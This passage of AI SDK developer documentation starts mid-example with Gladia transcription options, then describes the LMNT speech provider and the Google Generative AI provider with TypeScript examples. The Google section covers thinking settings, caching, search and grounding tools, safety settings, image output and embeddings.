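import { gladia, type GladiaTranscriptionModelOptions } from '@ai-sdk/gladia';
import { readFile } from 'fs/promises';
const result = await transcribe({
  model: gladia.transcription(),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    gladia: {
      diarization: true,
      diarizationConfig: { minSpeakers: 1, maxSpeakers: 3 },
      translation: true,
      translationConfig: { targetLanguages: ['fr'], model: 'base' },
    } satisfies GladiaTranscriptionModelOptions,
  },
});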
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| Default | | | | |
title: LMNT description: Learn how to use the LMNT provider for the AI SDK.
LMNT Provider
The LMNT provider contains speech model support for the LMNT speech synthesis API.
Setup
The LMNT provider is available in the @ai-sdk/lmnt module. You can install it with:
pnpm add @ai-sdk/lmnt
Provider Instance
You can import the default provider instance lmnt from @ai-sdk/lmnt:
import { lmnt } from '@ai-sdk/lmnt';
If you need a customized setup, you can import createLMNT from @ai-sdk/lmnt and create a provider instance with your settings:
import { createLMNT } from '@ai-sdk/lmnt';
const lmnt = createLMNT({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the LMNT provider instance:
- apiKey string - API key that is being sent using the Authorization header. It defaults to the LMNT_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Speech Models
You can create models that call the LMNT speech API
using the .speech() factory method.
The first argument is the model id e.g. aurora.
const model = lmnt.speech('aurora');
The voice parameter can be set to a voice ID from LMNT. You can find available voices in the LMNT documentation.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';
const result = await generateSpeech({
model: lmnt.speech('aurora'),
text: 'Hello, world!',
voice: 'ava',
language: 'en',
});
You can also pass additional provider-specific options using the providerOptions argument:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';
import { type LMNTSpeechModelOptions } from '@ai-sdk/lmnt';
const result = await generateSpeech({
model: lmnt.speech('aurora'),
text: 'Hello, world!',
voice: 'ava',
language: 'en',
providerOptions: {
lmnt: {
conversational: true,
speed: 1.2,
} satisfies LMNTSpeechModelOptions,
},
});
Provider Options
The LMNT provider accepts the following options via providerOptions.lmnt:
- format 'aac' | 'mp3' | 'mulaw' | 'raw' | 'wav' - The audio format to return. Defaults to 'mp3'.
- sampleRate 8000 | 16000 | 24000 - The sample rate of the audio in Hz. Defaults to 24000.
- speed number - The speed of the speech. Must be between 0.25 and 2. Defaults to 1.
- seed number - An optional seed for deterministic generation.
- conversational boolean - Whether to use a conversational style. Defaults to false. Does not work with the blizzard model.
- length number - Maximum length of the audio in seconds. Maximum value is 300. Does not work with the blizzard model.
- topP number - Top-p sampling parameter. Must be between 0 and 1. Defaults to 1.
- temperature number - Temperature parameter for sampling. Must be at least 0. Defaults to 1.
Model Capabilities
| Model | Instructions |
|---|---|
| aurora | |
| blizzard | |
title: Google Generative AI description: Learn how to use Google Generative AI Provider.
Google Generative AI Provider
The Google Generative AI provider contains language and embedding model support for the Google Generative AI APIs.
Setup
The Google provider is available in the @ai-sdk/google module. You can install it with:
pnpm add @ai-sdk/google
Provider Instance
You can import the default provider instance google from @ai-sdk/google:
import { google } from '@ai-sdk/google';
If you need a customized setup, you can import createGoogleGenerativeAI from @ai-sdk/google and create a provider instance with your settings:
import { createGoogleGenerativeAI } from '@ai-sdk/google';
const google = createGoogleGenerativeAI({
// custom settings
});
You can use the following optional settings to customize the Google Generative AI provider instance:
- baseURL string - Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://generativelanguage.googleapis.com/v1beta.
- apiKey string - API key that is being sent using the x-goog-api-key header. It defaults to the GOOGLE_GENERATIVE_AI_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- generateId () => string - Optional function to generate unique IDs for each request. Defaults to the SDK's built-in ID generator.
- name string - Custom provider name. Defaults to 'google.generative-ai'.
Language Models
You can create models that call the Google Generative AI API using the provider instance.
The first argument is the model id, e.g. gemini-2.5-flash.
The models support tool calls and some have multi-modal capabilities.
const model = google('gemini-2.5-flash');
You can use Google Generative AI language models to generate text with the generateText function:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemini-2.5-flash'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Google Generative AI language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
Google Generative AI also supports some model specific settings that are not part of the standard call settings. You can pass them as an options argument:
import { google, type GoogleLanguageModelOptions } from '@ai-sdk/google';
const model = google('gemini-2.5-flash');
await generateText({
model,
providerOptions: {
google: {
safetySettings: [
{
category: 'HARM_CATEGORY_UNSPECIFIED',
threshold: 'BLOCK_LOW_AND_ABOVE',
},
],
} satisfies GoogleLanguageModelOptions,
},
});
The following optional provider options are available for Google Generative AI models:
- cachedContent string - Optional. The name of the cached content used as context to serve the prediction. Format: cachedContents/{cachedContent}
- structuredOutputs boolean - Optional. Enable structured output. Default is true. This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google Generative AI uses. You can use this to disable structured outputs if you need to. See Troubleshooting: Schema Limitations for more details.
- safetySettings Array<{ category: string; threshold: string }> - Optional. Safety settings for the model.
  - category string - The category of the safety setting. Can be one of the following: HARM_CATEGORY_UNSPECIFIED, HARM_CATEGORY_HATE_SPEECH, HARM_CATEGORY_DANGEROUS_CONTENT, HARM_CATEGORY_HARASSMENT, HARM_CATEGORY_SEXUALLY_EXPLICIT, HARM_CATEGORY_CIVIC_INTEGRITY
  - threshold string - The threshold of the safety setting. Can be one of the following: HARM_BLOCK_THRESHOLD_UNSPECIFIED, BLOCK_LOW_AND_ABOVE, BLOCK_MEDIUM_AND_ABOVE, BLOCK_ONLY_HIGH, BLOCK_NONE, OFF
- responseModalities string[] - The modalities to use for the response. The following modalities are supported: TEXT, IMAGE. When not defined or empty, the model defaults to returning only text (see the sketch after this list).
- thinkingConfig { thinkingLevel?: 'minimal' | 'low' | 'medium' | 'high'; thinkingBudget?: number; includeThoughts?: boolean } - Optional. Configuration for the model's thinking process. Only supported by specific Google Generative AI models.
  - thinkingLevel 'minimal' | 'low' | 'medium' | 'high' - Optional. Controls the thinking depth for Gemini 3 models. Gemini 3.1 Pro supports 'low', 'medium', and 'high', Gemini 3 Pro supports 'low' and 'high', while Gemini 3 Flash supports all four levels: 'minimal', 'low', 'medium', and 'high'. Only supported by Gemini 3 models.
  - thinkingBudget number - Optional. Gives the model guidance on the number of thinking tokens it can use when generating a response. Setting it to 0 disables thinking, if the model supports it. For more information about the possible value ranges for each model see the Google Generative AI thinking documentation.
  - includeThoughts boolean - Optional. If set to true, thought summaries are returned, which are synthesized versions of the model's raw thoughts and offer insights into the model's internal reasoning process.
- imageConfig { aspectRatio?: string, imageSize?: string } - Optional. Configuration for the model's image generation. Only supported by specific Google Generative AI models.
  - aspectRatio string - The model defaults to generating 1:1 squares, or to matching the output image size to that of your input image. Can be one of the following: 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9
  - imageSize string - Controls the output image resolution. Defaults to 1K. Can be one of the following: 1K, 2K, 4K
- audioTimestamp boolean - Optional. Enables timestamp understanding for audio-only files. See the Google Cloud audio understanding documentation.
- mediaResolution string - Optional. If specified, the media resolution specified will be used. Can be one of the following: MEDIA_RESOLUTION_UNSPECIFIED, MEDIA_RESOLUTION_LOW, MEDIA_RESOLUTION_MEDIUM, MEDIA_RESOLUTION_HIGH
- labels Record<string, string> - Optional. Defines labels used in billing reports. Available on Vertex AI only. See the Google Cloud labels documentation.
- serviceTier 'standard' | 'flex' | 'priority' - Optional. The service tier to use for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency. Set to 'priority' for ultra-low latency at a 75-100% price premium over 'standard'.
- threshold string - Optional. Standalone threshold setting that can be used independently of safetySettings. Uses the same values as the safetySettings threshold.
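As referenced in the responseModalities entry above, a minimal sketch of requesting image output (the model id is an assumption; check the Google model list for image-capable models):
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
  model: google('gemini-2.5-flash-image-preview'), // assumed image-capable model id
  prompt: 'Generate an image of a comic cat',
  providerOptions: {
    google: {
      responseModalities: ['TEXT', 'IMAGE'],
    },
  },
});
// generated images are exposed as file parts on the result
for (const file of result.files) {
  if (file.mediaType.startsWith('image/')) {
    // file.uint8Array contains the generated image bytes
  }
}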
Thinking
The Gemini 2.5 and Gemini 3 series models use an internal "thinking process" that significantly improves their reasoning and multi-step planning abilities, making them highly effective for complex tasks such as coding, advanced mathematics, and data analysis. For more information see Google Generative AI thinking documentation.
Gemini 3 Models
For Gemini 3 models, use the thinkingLevel parameter to control the depth of reasoning:
import { google, GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const model = google('gemini-3.1-pro-preview');
const { text, reasoning } = await generateText({
model: model,
prompt: 'What is the sum of the first 10 prime numbers?',
providerOptions: {
google: {
thinkingConfig: {
thinkingLevel: 'high',
includeThoughts: true,
},
} satisfies GoogleLanguageModelOptions,
},
});
console.log(text);
console.log(reasoning); // Reasoning summary
Gemini 2.5 Models
For Gemini 2.5 models, use the thinkingBudget parameter to control the number of thinking tokens:
import { google, GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const model = google('gemini-2.5-flash');
const { text, reasoning } = await generateText({
model: model,
prompt: 'What is the sum of the first 10 prime numbers?',
providerOptions: {
google: {
thinkingConfig: {
thinkingBudget: 8192,
includeThoughts: true,
},
} satisfies GoogleLanguageModelOptions,
},
});
console.log(text);
console.log(reasoning); // Reasoning summary
File Inputs
The Google Generative AI provider supports file inputs, e.g. PDF files.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
import fs from 'node:fs';
const result = await generateText({
model: google('gemini-2.5-flash'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
},
],
},
],
});
You can also use YouTube URLs directly:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: google('gemini-2.5-flash'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Summarize this video',
},
{
type: 'file',
data: 'https://www.youtube.com/watch?v=dQw4w9WgXcQ',
mediaType: 'video/mp4',
},
],
},
],
});
See File Parts for details on how to use files in prompts.
Cached Content
Google Generative AI supports both explicit and implicit caching to help reduce costs on repetitive content.
Implicit Caching
Gemini 2.5 models automatically provide cache cost savings without needing to create an explicit cache. When you send requests that share common prefixes with previous requests, you'll receive a 75% token discount on cached content.
To maximize cache hits with implicit caching:
- Keep content at the beginning of requests consistent
- Add variable content (like user questions) at the end of prompts
- Ensure requests meet minimum token requirements:
- Gemini 2.5 Flash: 1024 tokens minimum
- Gemini 2.5 Pro: 2048 tokens minimum
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
// Structure prompts with consistent content at the beginning
const baseContext =
'You are a cooking assistant with expertise in Italian cuisine. Here are 1000 lasagna recipes for reference...';
const { text: veggieLasagna } = await generateText({
model: google('gemini-2.5-pro'),
prompt: `${baseContext}\n\nWrite a vegetarian lasagna recipe for 4 people.`,
});
// Second request with same prefix - eligible for cache hit
const { text: meatLasagna, providerMetadata } = await generateText({
model: google('gemini-2.5-pro'),
prompt: `${baseContext}\n\nWrite a meat lasagna recipe for 12 people.`,
});
// Check cached token count in usage metadata
console.log('Cached tokens:', providerMetadata.google);
// e.g.
// {
// groundingMetadata: null,
// safetyRatings: null,
// usageMetadata: {
// cachedContentTokenCount: 2027,
// thoughtsTokenCount: 702,
// promptTokenCount: 2152,
// candidatesTokenCount: 710,
// totalTokenCount: 3564
// }
// }
Explicit Caching
For guaranteed cost savings, you can still use explicit caching with Gemini 2.5 and 2.0 models. See the models page to check if caching is supported for the used model:
import { google, type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { GoogleGenAI } from '@google/genai';
import { generateText } from 'ai';
const ai = new GoogleGenAI({
apiKey: process.env.GOOGLE_GENERATIVE_AI_API_KEY,
});
const model = 'gemini-2.5-pro';
// Create a cache with the content you want to reuse
const cache = await ai.caches.create({
model,
config: {
contents: [
{
role: 'user',
parts: [{ text: '1000 Lasagna Recipes...' }],
},
],
ttl: '300s', // Cache expires after 5 minutes
},
});
const { text: veggieLasagnaRecipe } = await generateText({
model: google(model),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
providerOptions: {
google: {
cachedContent: cache.name,
} satisfies GoogleLanguageModelOptions,
},
});
const { text: meatLasagnaRecipe } = await generateText({
model: google(model),
prompt: 'Write a meat lasagna recipe for 12 people.',
providerOptions: {
google: {
cachedContent: cache.name,
} satisfies GoogleLanguageModelOptions,
},
});
Code Execution
With Code Execution, certain models can generate and execute Python code to perform calculations, solve problems, or provide more accurate information.
You can enable code execution by adding the code_execution tool to your request.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, toolCalls, toolResults } = await generateText({
model: google('gemini-2.5-pro'),
tools: { code_execution: google.tools.codeExecution({}) },
prompt: 'Use python to calculate the 20th fibonacci number.',
});
The response will contain the tool calls and results from the code execution.
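For example, you can log these parts to inspect the generated Python and its output (a minimal sketch):
console.log(toolCalls); // the code_execution invocations, including the generated Python
console.log(toolResults); // the execution results returned by the provider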
Google Search
With Google Search grounding, the model has access to the latest information using Google Search.
import {
  google,
  type GoogleGenerativeAIProviderMetadata,
} from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-2.5-flash'),
tools: {
google_search: google.tools.googleSearch({}),
},
prompt:
'List the top 5 San Francisco news from the past week.' +
'You must include the date of each article.',
});
// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
| GoogleGenerativeAIProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;
The googleSearch tool accepts the following optional configuration options:
- searchTypes object
  Enables specific search types. Both can be combined.
  - webSearch: Enable web search grounding (pass {} to enable). This is the default.
  - imageSearch: Enable image search grounding (pass {} to enable).
- timeRangeFilter object
  Restricts search results to a specific time range. Both startTime and endTime are required.
  - startTime: Start time in ISO 8601 format (e.g. '2025-01-01T00:00:00Z').
  - endTime: End time in ISO 8601 format (e.g. '2025-12-31T23:59:59Z').
google.tools.googleSearch({
searchTypes: { webSearch: {} },
timeRangeFilter: {
startTime: '2025-01-01T00:00:00Z',
endTime: '2025-12-31T23:59:59Z',
},
});
When Google Search grounding is enabled, the model will include sources in the response.
Additionally, the grounding metadata includes detailed information about how search results were used to ground the model's response. Here are the available fields:
- webSearchQueries (string[] | null) - Array of search queries used to retrieve information
  - Example: ["What's the weather in Chicago this weekend?"]
- searchEntryPoint ({ renderedContent: string } | null) - Contains the main search result content used as an entry point
  - The renderedContent field contains the formatted content
- groundingSupports (Array of support objects | null) - Contains details about how specific response parts are supported by search results
  - Each support object includes:
    - segment: Information about the grounded text segment (text: the actual text segment, startIndex: starting position in the response, endIndex: ending position in the response)
    - groundingChunkIndices: References to supporting search result chunks
    - confidenceScores: Confidence scores (0-1) for each supporting chunk
Example response:
{
"groundingMetadata": {
"webSearchQueries": ["What's the weather in Chicago this weekend?"],
"searchEntryPoint": {
"renderedContent": "..."
},
"groundingSupports": [
{
"segment": {
"startIndex": 0,
"endIndex": 65,
"text": "Chicago weather changes rapidly, so layers let you adjust easily."
},
"groundingChunkIndices": [0],
"confidenceScores": [0.99]
}
]
}
}
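To see which search chunks back each part of the answer, you can walk the grounding supports (a minimal sketch, assuming the metadata cast shown above):
const supports = metadata?.groundingMetadata?.groundingSupports ?? [];
for (const support of supports) {
  console.log(support.segment?.text, '-> chunks:', support.groundingChunkIndices);
}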
Enterprise Web Search
With Enterprise Web Search, the model has access to a compliance-focused web index designed for highly-regulated industries such as finance, healthcare, and public sector.
import { createVertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const vertex = createVertex({
project: 'my-project',
location: 'us-central1',
});
const { text, sources, providerMetadata } = await generateText({
model: vertex('gemini-2.5-flash'),
tools: {
enterprise_web_search: vertex.tools.enterpriseWebSearch({}),
},
prompt: 'What are the latest regulatory updates for financial services?',
});
Enterprise Web Search provides the following benefits:
- Does not log customer data
- Supports VPC service controls
- Compliance-focused web index for regulated industries
File Search
The File Search tool lets Gemini retrieve context from your own documents that you have indexed in File Search stores. Only Gemini 2.5 and Gemini 3 models support this feature.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources } = await generateText({
model: google('gemini-2.5-pro'),
tools: {
file_search: google.tools.fileSearch({
fileSearchStoreNames: [
'projects/my-project/locations/us/fileSearchStores/my-store',
],
metadataFilter: 'author = "Robert Graves"',
topK: 8,
}),
},
prompt: "Summarise the key themes of 'I, Claudius'.",
});
File Search responses include citations via the normal sources field and expose raw grounding metadata in providerMetadata.google.groundingMetadata.
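For example, you can iterate over the returned sources to log the citations for the retrieved documents (a minimal sketch):
for (const source of sources) {
  console.log(source); // citation for a retrieved document
}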
URL Context
Google provides a provider-defined URL context tool.
The URL context tool allows you to provide specific URLs that you want the model to analyze directly from the prompt.
import {
  google,
  type GoogleGenerativeAIProviderMetadata,
} from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-2.5-flash'),
prompt: `Based on the document: https://ai.google.dev/gemini-api/docs/url-context.
Answer this question: How many links can we consume in one request?`,
tools: {
url_context: google.tools.urlContext({}),
},
});
const metadata = providerMetadata?.google as
| GoogleGenerativeAIProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const urlContextMetadata = metadata?.urlContextMetadata;
The URL context metadata includes detailed information about how the model used the URL context to generate the response. Here are the available fields:
- urlMetadata ({ retrievedUrl: string; urlRetrievalStatus: string; }[] | null) - Array of URL context metadata
  - Each object includes:
    - retrievedUrl: The URL of the context
    - urlRetrievalStatus: The status of the URL retrieval
Example response:
{
"urlMetadata": [
{
"retrievedUrl": "https://ai-sdk.dev/providers/ai-sdk-providers/google-generative-ai",
"urlRetrievalStatus": "URL_RETRIEVAL_STATUS_SUCCESS"
}
]
}
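A minimal sketch for checking that each URL was actually retrieved (assuming the urlContextMetadata cast shown above):
for (const entry of urlContextMetadata?.urlMetadata ?? []) {
  if (entry.urlRetrievalStatus !== 'URL_RETRIEVAL_STATUS_SUCCESS') {
    console.warn('Failed to retrieve:', entry.retrievedUrl);
  }
}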
With the URL context tool, you will also get the groundingMetadata.
"groundingMetadata": {
"groundingChunks": [
{
"web": {
"uri": "https://ai-sdk.dev/providers/ai-sdk-providers/google-generative-ai",
"title": "Google Generative AI - AI SDK Providers"
}
}
],
"groundingSupports": [
{
"segment": {
"startIndex": 67,
"endIndex": 157,
"text": "**Installation**: Install the `@ai-sdk/google` module using your preferred package manager"
},
"groundingChunkIndices": [
0
]
}
]
}
You can add up to 20 URLs per request.
Combine URL Context with Search Grounding
You can combine the URL context tool with search grounding to provide the model with the latest information from the web.
import {
  google,
  type GoogleGenerativeAIProviderMetadata,
} from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-2.5-flash'),
prompt: `Based on this context: https://ai-sdk.dev/providers/ai-sdk-providers/google-generative-ai, tell me how to use Gemini with AI SDK.
Also, provide the latest news about AI SDK V5.`,
tools: {
google_search: google.tools.googleSearch({}),
url_context: google.tools.urlContext({}),
},
});
const metadata = providerMetadata?.google as
| GoogleGenerativeAIProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const urlContextMetadata = metadata?.urlContextMetadata;
Google Maps Grounding
With Google Maps grounding, the model has access to Google Maps data for location-aware responses. This enables providing local data and geospatial context, such as finding nearby restaurants.
import {
  google,
  type GoogleLanguageModelOptions,
  type GoogleGenerativeAIProviderMetadata,
} from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-2.5-flash'),
tools: {
google_maps: google.tools.googleMaps({}),
},
providerOptions: {
google: {
retrievalConfig: {
latLng: { latitude: 34.090199, longitude: -117.881081 },
},
} satisfies GoogleLanguageModelOptions,
},
prompt:
'What are the best Italian restaurants within a 15-minute walk from here?',
});
const metadata = providerMetadata?.google as
| GoogleGenerativeAIProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
The optional retrievalConfig.latLng provider option provides location context for queries about nearby places. This configuration applies to any grounding tools that support location context, including Google Maps and Google Search.
When Google Maps grounding is enabled, the model's response will include sources pointing to Google Maps URLs. The grounding metadata includes maps chunks with place information:
{
"groundingMetadata": {
"groundingChunks": [
{
"maps": {
"uri": "https://maps.google.com/?cid=12345",
"title": "Restaurant Name",
"placeId": "places/ChIJ..."
}
}
]
}
}
Google Maps grounding is supported on Gemini 2.0 and newer models.
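A minimal sketch for listing the Maps places the response was grounded on (assuming the groundingMetadata shape shown above):
for (const chunk of groundingMetadata?.groundingChunks ?? []) {
  const maps = (chunk as { maps?: { uri?: string; title?: string } }).maps;
  if (maps) {
    console.log(maps.title, maps.uri); // e.g. "Restaurant Name", a maps.google.com URL
  }
}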
RAG Engine Grounding
With RAG Engine Grounding, the model has access to your custom knowledge base using the Vertex RAG Engine. This enables the model to provide answers based on your specific data sources and documents.
import { createVertex } from '@ai-sdk/google-vertex';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';
const vertex = createVertex({
project: 'my-project',
location: 'us-central1',
});
const { text, sources, providerMetadata } = await generateText({
model: vertex('gemini-2.5-flash'),
tools: {
vertex_rag_store: vertex.tools.vertexRagStore({
ragCorpus:
'projects/my-project/locations/us-central1/ragCorpora/my-rag-corpus',
topK: 5,
}),
},
prompt:
'What are the key features of our product according to our documentation?',
});
// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
| GoogleGenerativeAIProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;
When RAG Engine Grounding is enabled, the model will include sources from your RAG corpus in the response.
Additionally, the grounding metadata includes detailed information about how RAG results were used to ground the model's response. Here are the available fields:
- groundingChunks (Array of chunk objects | null) - Contains the retrieved context chunks from your RAG corpus
  - Each chunk includes:
    - retrievedContext: Information about the retrieved context (uri: the URI or identifier of the source document, title: the title of the source document (optional), text: the actual text content of the chunk)
- groundingSupports (Array of support objects | null) - Contains details about how specific response parts are supported by RAG results
  - Each support object includes:
    - segment: Information about the grounded text segment (text: the actual text segment, startIndex: starting position in the response, endIndex: ending position in the response)
    - groundingChunkIndices: References to supporting RAG result chunks
    - confidenceScores: Confidence scores (0-1) for each supporting chunk
Example response:
{
"groundingMetadata": {
"groundingChunks": [
{
"retrievedContext": {
"uri": "gs://my-bucket/docs/product-guide.pdf",
"title": "Product User Guide",
"text": "Our product includes advanced AI capabilities, real-time processing, and enterprise-grade security features."
}
}
],
"groundingSupports": [
{
"segment": {
"startIndex": 0,
"endIndex": 45,
"text": "Our product includes advanced AI capabilities and real-time processing."
},
"groundingChunkIndices": [0],
"confidenceScores": [0.95]
}
]
}
}
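A minimal sketch for logging which corpus documents grounded the answer (assuming the groundingMetadata cast shown above):
for (const chunk of groundingMetadata?.groundingChunks ?? []) {
  const context = (chunk as { retrievedContext?: { uri?: string; title?: string } })
    .retrievedContext;
  if (context) {
    console.log(context.title, context.uri); // source document title and URI
  }
}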
Configuration Options
The vertexRagStore tool accepts the following configuration options:
- ragCorpus (string, required)
  - The RagCorpus resource name in the format: projects/{project}/locations/{location}/ragCorpora/{rag_corpus}
  - This identifies your specific RAG corpus to search against
- topK (number, optional)
  - The number of top contexts to retrieve from your RAG corpus
  - Defaults to the corpus configuration if not specified
Image Outputs
Gemini models with image generation capabilities (e.g. gemini-2.5-flash-image) support generating images as part of a multimodal response. Images are exposed as files in the response.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: google('gemini-2.5-flash-image'),
prompt:
'Create a picture of a nano banana dish in a fancy restaurant with a Gemini theme',
});
for (const file of result.files) {
if (file.mediaType.startsWith('image/')) {
console.log('Generated image:', file);
}
}
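To persist a generated image, you can write its bytes to disk (a minimal sketch; GeneratedFile exposes the raw bytes as uint8Array, and the .png filename is an assumption):
import fs from 'node:fs';
for (const [index, file] of result.files.entries()) {
  if (file.mediaType.startsWith('image/')) {
    fs.writeFileSync(`image-${index}.png`, file.uint8Array); // raw image bytes
  }
}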
Safety Ratings
The safety ratings provide insight into the safety of the model's response. See Google AI documentation on safety settings.
Example response excerpt:
{
"safetyRatings": [
{
"category": "HARM_CATEGORY_HATE_SPEECH",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11027937,
"severity": "HARM_SEVERITY_LOW",
"severityScore": 0.28487435
},
{
"category": "HARM_CATEGORY_DANGEROUS_CONTENT",
"probability": "HIGH",
"blocked": true,
"probabilityScore": 0.95422274,
"severity": "HARM_SEVERITY_MEDIUM",
"severityScore": 0.43398145
},
{
"category": "HARM_CATEGORY_HARASSMENT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11085559,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.19027223
},
{
"category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.22901751,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.09089675
}
]
}
Troubleshooting
Schema Limitations
The Google Generative AI API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:
GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified
By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:
import { google, type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const { output } = await generateText({
model: google('gemini-2.5-flash'),
providerOptions: {
google: {
structuredOutputs: false,
} satisfies GoogleLanguageModelOptions,
},
output: Output.object({
schema: z.object({
name: z.string(),
age: z.number(),
contact: z.union([
z.object({
type: z.literal('email'),
value: z.string(),
}),
z.object({
type: z.literal('phone'),
value: z.string(),
}),
]),
}),
}),
prompt: 'Generate an example person for testing.',
});
The following Zod features are known to not work with Google Generative AI:
- z.union
- z.record
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming | Google Search | URL Context |
|---|---|---|---|---|---|---|
| gemini-3.1-pro-preview | | | | | | |
| gemini-3.1-flash-image-preview | | | | | | |
| gemini-3.1-flash-lite-preview | | | | | | |
| gemini-3-pro-preview | | | | | | |
| gemini-3-pro-image-preview | | | | | | |
| gemini-3-flash-preview | | | | | | |
| gemini-2.5-pro | | | | | | |
| gemini-2.5-flash | | | | | | |
| gemini-2.5-flash-lite | | | | | | |
| gemini-2.5-flash-lite-preview-06-17 | | | | | | |
| gemini-2.0-flash | | | | | | |
Gemma Models
You can use Gemma models with the Google Generative AI API. The following Gemma models are available:
- gemma-3-27b-it
- gemma-3-12b-it
Gemma models don't natively support the systemInstruction parameter, but the provider automatically handles system instructions by prepending them to the first user message. This allows you to use system instructions with Gemma models seamlessly:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemma-3-27b-it'),
system: 'You are a helpful assistant that responds concisely.',
prompt: 'What is machine learning?',
});
The system instruction is automatically formatted and included in the conversation, so Gemma models can follow the guidance without any additional configuration.
Embedding Models
You can create models that call the Google Generative AI embeddings API
using the .embedding() factory method.
const model = google.embedding('gemini-embedding-001');
The Google Generative AI provider sends API calls to the right endpoint based on the type of embedding:
- Single embeddings: When embedding a single value with embed(), the provider uses the single :embedContent endpoint, which typically has higher rate limits compared to the batch endpoint.
- Batch embeddings: When embedding multiple values with embedMany() (or multiple values in embed()), the provider uses the :batchEmbedContents endpoint.
Google Generative AI embedding models support additional settings. You can pass them as an options argument:
import { google, type GoogleEmbeddingModelOptions } from '@ai-sdk/google';
import { embed } from 'ai';
const model = google.embedding('gemini-embedding-001');
const { embedding } = await embed({
model,
value: 'sunny day at the beach',
providerOptions: {
google: {
outputDimensionality: 512, // optional, number of dimensions for the embedding
taskType: 'SEMANTIC_SIMILARITY', // optional, specifies the task type for generating embeddings
content: [[{ text: 'additional context' }]], // optional, per-value multimodal content (only 1 here, since `value` is only a single one)
} satisfies GoogleEmbeddingModelOptions,
},
});
When using embedMany, provide per-value multimodal content via the content option. Each entry corresponds to a value at the same index; use null for text-only entries:
import { google, type GoogleEmbeddingModelOptions } from '@ai-sdk/google';
import { embedMany } from 'ai';
const { embeddings } = await embedMany({
model: google.embedding('gemini-embedding-2-preview'),
values: ['sunny day at the beach', 'rainy afternoon in the city'],
providerOptions: {
google: {
// content array must have the same length as values
content: [
[{ inlineData: { mimeType: 'image/png', data: '<base64>' } }], // pairs with values[0]
null, // text-only, pairs with values[1]
],
} satisfies GoogleEmbeddingModelOptions,
},
});
The following optional provider options are available for Google Generative AI embedding models:
- outputDimensionality: number
  Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
- taskType: string
  Optional. Specifies the task type for generating embeddings. Supported task types include:
  - SEMANTIC_SIMILARITY: Optimized for text similarity.
  - CLASSIFICATION: Optimized for text classification.
  - CLUSTERING: Optimized for clustering texts based on similarity.
